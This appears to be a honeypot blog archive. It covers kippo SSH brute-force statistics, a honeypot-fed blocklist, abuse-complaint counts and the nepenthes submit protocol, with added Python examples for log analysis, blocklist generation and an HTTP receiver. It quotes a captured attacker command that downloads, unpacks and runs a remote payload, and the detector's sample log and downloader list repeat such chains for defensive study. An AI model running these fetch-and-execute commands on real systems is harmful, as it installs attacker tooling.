Posts Tagged ‘Honeypots’

projecthoneypot.org

Thursday, January 26th, 2012

Today I received a notification from projecthoneypot.org
that one of my donated spamtrap-domains helped to catch a new
harvester. Feels good to be able to help 🙂

kippo-graph

Wednesday, December 28th, 2011

After trying to build some nice graphs for the kippo honeypot with PyCha, I found this little toolbox, which makes things way better than I did:

kippo-graph Homepage (link fixed)

Here are the first results from my honeypot (no live DB queries are made, so inputs are not visible right now): Kippo-Stats

kippo stats

Wednesday, December 14th, 2011

The kippo honeypot has now been running for about a week..

Up to now I have seen

* more than 1.3 million connects

* more than 7,100 successful logins

* more than 2,200 commands typed

* more than 2,100 different source IP addresses

* 178 files uploaded, most of them psyBNC bouncers

Wow.. I expected *some* brute-force attempts, but that many?

successful ssh brute-force found by kippo

Wednesday, December 7th, 2011

The sshd honeypot kippo is a fun tool to play with. After installing it I found
more than 1000 successful logins in about 12 hours! Most logins do nothing
after succeeding, but some download files and try to do “things”:

-rw------- 1 kippo kippo 81211778 Dec 6 23:20 20111206231910_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw------- 1 kippo kippo 34603008 Dec 7 01:19 20111207011938_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw------- 1 kippo kippo 53477376 Dec 7 01:21 20111207012055_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
-rw------- 1 kippo kippo 3513408 Dec 7 01:21 20111207012120_http___www_steampowered_com_download_hldsupdatetool_bin
-rw------- 1 kippo kippo 608074 Dec 7 08:46 20111207084559_http___4u_moy_su_bnc_jpg

coming from commands like:

CMD: wget http://4u.moy.su/bnc.jpg;tar zxvf bnc.jpg;rm -rf bnc.jpg;cd .log;./go

I will try to build some public stats later..
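The command chain quoted above (fetch an archive named like an image, unpack it, delete the archive, change into the dropped directory and run the binary) is exactly the pattern worth alerting on. As an added example, not part of the original post and not kippo's own code, here is a small Python pass over kippo-style log lines: it splits each typed command at `;`, `&&`, `||` and `|`, sorts the pieces into download / extract / cleanup / execute stages and flags chains that both download and execute. The log lines are constructed; the `CMD: ...` part is the form shown on this page, while the timestamp and the `[...,<session>,<source ip>]` prefix are an assumption about the rest of kippo's log format.

```python
import re
from typing import Dict, List

# Constructed sample lines in the shape kippo logs typed commands. The
# "CMD: ..." part is the form quoted on this page; the timestamp and the
# "[...,<session>,<source ip>]" prefix are an assumption about the rest of
# the log line. The second line is the chain from the page.
SAMPLE_LOG = """\
2011-12-07 08:45:12+0100 [HoneyPotTransport,12,198.51.100.7] CMD: uname -a; w
2011-12-07 08:45:59+0100 [HoneyPotTransport,12,198.51.100.7] CMD: wget http://4u.moy.su/bnc.jpg;tar zxvf bnc.jpg;rm -rf bnc.jpg;cd .log;./go
2011-12-07 09:02:31+0100 [HoneyPotTransport,19,203.0.113.42] CMD: cd /tmp && curl -O http://example.invalid/x.tgz && tar xzf x.tgz && chmod +x ./run && ./run
2011-12-07 09:10:02+0100 [HoneyPotTransport,23,192.0.2.9] CMD: cat /proc/cpuinfo | grep MHz
"""

CMD_RE = re.compile(r"^(?P<ts>\S+ \S+) \[[^\]]*,(?P<ip>[\d.]+)\] CMD: (?P<cmd>.*)$")
URL_RE = re.compile(r"(?:https?|ftp)://[^\s;&|'\"]+")
SPLIT_RE = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")

DOWNLOADERS = {"wget", "curl", "fetch", "ftp", "tftp", "lwp-download"}
EXTRACTORS = {"tar", "unzip", "gunzip", "bunzip2", "unrar"}
INTERPRETERS = {"sh", "bash", "perl", "python"}


def split_chain(cmd: str) -> List[str]:
    """Split a shell one-liner at ; && || and | into its single commands."""
    return [piece for piece in SPLIT_RE.split(cmd.strip()) if piece]


def stages(cmd: str) -> Dict[str, bool]:
    """Which stages of a fetch-unpack-run chain does this command line contain?"""
    found = {"download": False, "extract": False, "cleanup": False, "execute": False}
    for piece in split_chain(cmd):
        argv = piece.split()
        if not argv:
            continue
        head = argv[0]
        prog = head.rsplit("/", 1)[-1]          # basename, so /usr/bin/wget == wget
        if prog in DOWNLOADERS or URL_RE.search(piece):
            found["download"] = True
        elif prog in EXTRACTORS:
            found["extract"] = True
        elif prog == "rm":
            found["cleanup"] = True
        elif head.startswith("./") or prog in INTERPRETERS or (prog == "chmod" and "+x" in argv):
            found["execute"] = True
    return found


def analyze(log_text: str) -> List[Dict]:
    """Parse CMD lines and flag every chain that both downloads and executes."""
    results = []
    for line in log_text.splitlines():
        m = CMD_RE.match(line)
        if not m:
            continue
        cmd = m.group("cmd")
        st = stages(cmd)
        results.append({
            "ts": m.group("ts"),
            "ip": m.group("ip"),
            "cmd": cmd,
            "urls": URL_RE.findall(cmd),
            "stages": st,
            "suspicious": st["download"] and st["execute"],
        })
    return results


if __name__ == "__main__":
    for r in analyze(SAMPLE_LOG):
        if r["suspicious"]:
            print(f'{r["ts"]} {r["ip"]} fetches {r["urls"]} and runs it: {r["cmd"]}')
```

The URLs it extracts are the same ones kippo mangles into the download file names above, so they can be fed straight into a blocklist or a fetch-and-hash job; a chain that only downloads (no execute stage) is reported but not flagged, which keeps curious `wget --help` typists out of the alerts.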

C&C honeypot

Thursday, November 4th, 2010

Now the criminals run honeypots too:

http://blog.tllod.com/2010/11/03/statistics-dont-lie-or-do-they/

Don’t trust the admin interface of a Malware Control Server..:-)

own rbl started

Saturday, May 8th, 2010

I finally managed to create my own RBL (realtime blocklist), fed by my honeypot.
All verified IPs which successfully attacked the honeypot are put into a database, which
provides an RBL for our MXes. The IPs are held for 24 hours, except those which have more than 50
successful attacks within the last day. I was wondering if there would be any mail hits to be seen
at all; after all, these are totally different attack vectors. But strangely enough I could see
blocked emails because of the entries made by the honeypot. We will see how well this
performs.
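One way to implement the listing policy described above: every successful attacker is listed for 24 hours, an IP with more than 50 successful attacks within one day stays listed longer, and the result is served as a DNSBL zone (reversed octets under the zone name, A record 127.0.0.2, TXT record with the reason). This is an added Python example, not the author's RBL code; the 7-day extended hold, the zone name rbl.example.invalid and the attack records are assumptions constructed for the demo, since the post does not say how long repeat offenders are kept.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import IPv4Address
from typing import Dict, Iterable, List, Tuple

HOLD = timedelta(hours=24)        # every successful attacker is listed for a day
REPEAT_THRESHOLD = 50             # more than this many hits within one day ...
LONG_HOLD = timedelta(days=7)     # ... keeps the IP listed this long (assumed value)
ZONE = "rbl.example.invalid"      # hypothetical zone name served to the MXes
DEMO_NOW = datetime(2010, 5, 8, 12, 0, 0)


def sample_attacks(now: datetime) -> List[Tuple[str, datetime]]:
    """Constructed stand-in for the honeypot database: (source IP, time of a successful attack)."""
    rows = [("198.51.100.7", now - timedelta(hours=2)),     # one hit, still inside 24h
            ("192.0.2.9", now - timedelta(hours=30))]       # one hit, already expired
    rows += [("203.0.113.42", now - timedelta(days=3, minutes=i)) for i in range(60)]  # burst 3 days ago
    rows += [("203.0.113.43", now - timedelta(minutes=i)) for i in range(60)]          # burst right now
    return rows


def listing(rows: Iterable[Tuple[str, datetime]], now: datetime) -> Dict[str, datetime]:
    """Return {ip: expiry} for every IP that should still be blocked at `now`.

    Each hit earns HOLD from its own timestamp; a hit that is the 51st (or later)
    within the preceding 24 hours earns LONG_HOLD instead. The latest expiry wins.
    """
    by_ip: Dict[str, List[datetime]] = defaultdict(list)
    for ip, t in rows:
        by_ip[ip].append(t)
    listed: Dict[str, datetime] = {}
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        expiry = times[0] + HOLD
        for i, t in enumerate(times):
            while times[start] <= t - HOLD:      # slide the window to (t - 24h, t]
                start += 1
            hits_last_day = i - start + 1
            candidate = t + (LONG_HOLD if hits_last_day > REPEAT_THRESHOLD else HOLD)
            expiry = max(expiry, candidate)
        if expiry > now:
            listed[ip] = expiry
    return listed


def rbl_name(ip: str) -> str:
    """DNSBL convention: the reversed dotted quad under the zone (IPv4 only)."""
    octets = str(IPv4Address(ip)).split(".")   # IPv4Address() rejects garbage from the DB
    return ".".join(reversed(octets)) + "." + ZONE


def zone_records(listed: Dict[str, datetime]) -> List[str]:
    """Render the listing as A/TXT records; 127.0.0.2 is the usual 'listed' answer."""
    records = []
    for ip in sorted(listed, key=IPv4Address):
        name = rbl_name(ip)
        records.append(f"{name}. IN A 127.0.0.2")
        records.append(f'{name}. IN TXT "honeypot attacker, listed until {listed[ip]:%Y-%m-%d %H:%M}"')
    return records


if __name__ == "__main__":
    print("\n".join(zone_records(listing(sample_attacks(DEMO_NOW), DEMO_NOW))))
```

Regenerating the zone from the raw attack table on every run, rather than storing expiry dates, means a change of policy (a shorter hold, a different threshold) takes effect at the next rebuild without touching old rows; the sliding window also makes the "within the last day" test exact instead of counting per calendar day.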

50,000 complaints

Thursday, October 15th, 2009

Wow.. I finally crossed the 50,000 complaints line. I got about 18,600 replies to
my complaints; either autoreplies from abuse departments, activity statements from the
providers, or “over quota” or similar bounce messages from abuse mailboxes.
I hope that this service does some good.

20,000 complaints

Wednesday, August 19th, 2009

Since I began sending automated complaints about attacks on my honeypot, the system has now sent out more than 20,000 emails. Some positive reactions have reached me, so I hope that this service is somewhat helpful. The bounces from unreachable abuse addresses are funny.. I will put them on a different page soon.

New Honeypot

Tuesday, June 16th, 2009

The nepenthes team members have been busy working on a new (low-interaction) honeypot.
The name dionaea is taken from another carnivorous plant. Here is the link to the project homepage. Sounds interesting, since it is written in C with Python modules attached.

submit-mwserv.conf

Thursday, January 1st, 2009

When dealing with the submit modules of nepenthes, you will find several notices about the favourite one of the nepenthes authors, namely submit-mwserv (with the corresponding submit-mwserv.conf file).
However, there is no hint on how to write the necessary ‘submit’ application on the receiving server side..
To see what data is actually sent, I set up a listening socket and wrote the incoming raw data to a file.
It looked like:

POST /heartbeat HTTP/1.1
User-Agent: nepenthes 0.2.2 (Linux, x86, g++)
Host: www.spamversand.de:8989
Accept: */*
Content-Length: 487
Expect: 100-continue
Content-Type: multipart/form-data; boundary=----------------------------285dc72e916a

A normal HTTP POST request. Not really normal though, because the Expect: “100-continue” header was new to me. A quick Google check found RFC 2616, section 8.2.3, Use of the 100 (Continue) Status. So I will answer the request with a “100” response and see what data follows..
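To show the full exchange the post is waiting for, here is an added Python example of a minimal receiving side that honours Expect: 100-continue, together with a client that sends the header block from the page the same way nepenthes does. It is not nepenthes' code and not the author's submit server. The server reads the header block, sends `100 Continue` only if no body bytes have arrived yet (RFC 2616 8.2.3 lets a client stop waiting and send the body anyway, and then the interim reply may be skipped), reads Content-Length bytes and splits the multipart/form-data body at its boundary. The form fields, the socketpair transport and the thread are constructed for the demo; the field names nepenthes really sends are not on the page and are not assumed.

```python
import re
import socket
import threading
from typing import Dict, Tuple


def read_headers(conn: socket.socket) -> Tuple[bytes, Dict[str, str], bytes]:
    """Read the request line and headers; also return any body bytes that came
    with them (a client that did not wait for 100 Continue)."""
    buf = b""
    while b"\r\n\r\n" not in buf:
        chunk = conn.recv(4096)
        if not chunk:
            raise ConnectionError("peer closed before end of headers")
        buf += chunk
        if len(buf) > 64 * 1024:
            raise ValueError("header block too large")
    head, rest = buf.split(b"\r\n\r\n", 1)
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return lines[0], headers, rest


def read_exact(conn: socket.socket, already: bytes, n: int) -> bytes:
    """Collect exactly n body bytes, starting with what read_headers left over."""
    data = already
    while len(data) < n:
        chunk = conn.recv(min(65536, n - len(data)))
        if not chunk:
            raise ConnectionError("peer closed mid-body")
        data += chunk
    return data[:n]


def parse_multipart(content_type: str, body: bytes) -> Dict[str, bytes]:
    """Split a multipart/form-data body into {field name: raw value}."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("no multipart boundary in Content-Type")
    delimiter = b"--" + m.group(1).encode("latin-1")
    fields: Dict[str, bytes] = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):          # closing delimiter, nothing follows
            break
        if not part.startswith(b"\r\n"):
            continue
        head, _, value = part[2:].partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', head)
        if name is None:
            continue
        if value.endswith(b"\r\n"):         # the CRLF before the next delimiter is not data
            value = value[:-2]
        fields[name.group(1).decode("latin-1")] = value
    return fields


def handle_request(conn: socket.socket) -> Tuple[str, Dict[str, bytes]]:
    """Serve one POST: honour Expect: 100-continue, read the body, answer 200."""
    request_line, headers, rest = read_headers(conn)
    path = request_line.split()[1].decode("latin-1")
    length = int(headers.get("content-length", "0"))
    if headers.get("expect", "").lower() == "100-continue" and not rest:
        # The client is holding the body back until we say go (RFC 2616 8.2.3).
        # A non-empty `rest` means it gave up waiting and sent the body anyway.
        conn.sendall(b"HTTP/1.1 100 Continue\r\n\r\n")
    body = read_exact(conn, rest, length)
    fields = parse_multipart(headers.get("content-type", ""), body)
    conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\nConnection: close\r\n\r\nOK")
    return path, fields


def build_multipart(fields: Dict[str, bytes], boundary: str) -> Tuple[str, bytes]:
    """Encode fields as multipart/form-data (constructed client side of the demo)."""
    body = b""
    for name, value in fields.items():
        body += f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n'.encode("latin-1")
        body += value + b"\r\n"
    body += f"--{boundary}--\r\n".encode("latin-1")
    return f"multipart/form-data; boundary={boundary}", body


def client_with_expect(conn: socket.socket, path: str, fields: Dict[str, bytes]) -> Tuple[bool, bytes]:
    """Send the header block from the page, wait for 100 Continue, then the body."""
    ctype, body = build_multipart(fields, "----------------------------285dc72e916a")
    conn.sendall((f"POST {path} HTTP/1.1\r\n"
                  "User-Agent: nepenthes 0.2.2 (Linux, x86, g++)\r\n"
                  "Host: www.spamversand.de:8989\r\n"
                  "Accept: */*\r\n"
                  f"Content-Length: {len(body)}\r\n"
                  "Expect: 100-continue\r\n"
                  f"Content-Type: {ctype}\r\n\r\n").encode("latin-1"))
    interim = conn.recv(4096)
    got_100 = interim.startswith(b"HTTP/1.1 100")
    conn.sendall(body)
    final = conn.recv(4096)
    return got_100, final


def exchange(fields: Dict[str, bytes]) -> Tuple[bool, bytes, str, Dict[str, bytes]]:
    """Run server and client over a socketpair; returns what each side saw."""
    srv, cli = socket.socketpair()
    seen = {}

    def serve() -> None:
        seen["path"], seen["fields"] = handle_request(srv)

    t = threading.Thread(target=serve)
    t.start()
    got_100, final = client_with_expect(cli, "/heartbeat", fields)
    t.join()
    srv.close()
    cli.close()
    return got_100, final, seen["path"], seen["fields"]


if __name__ == "__main__":
    print(exchange({"version": b"0.2.2", "note": b"hello\r\nworld"}))
```

Two points a real submit server needs beyond this: cap Content-Length before reading (the heartbeat is 487 bytes, but the same module will later post captured binaries), and never trust the field values, since anything that can reach the port can post to it.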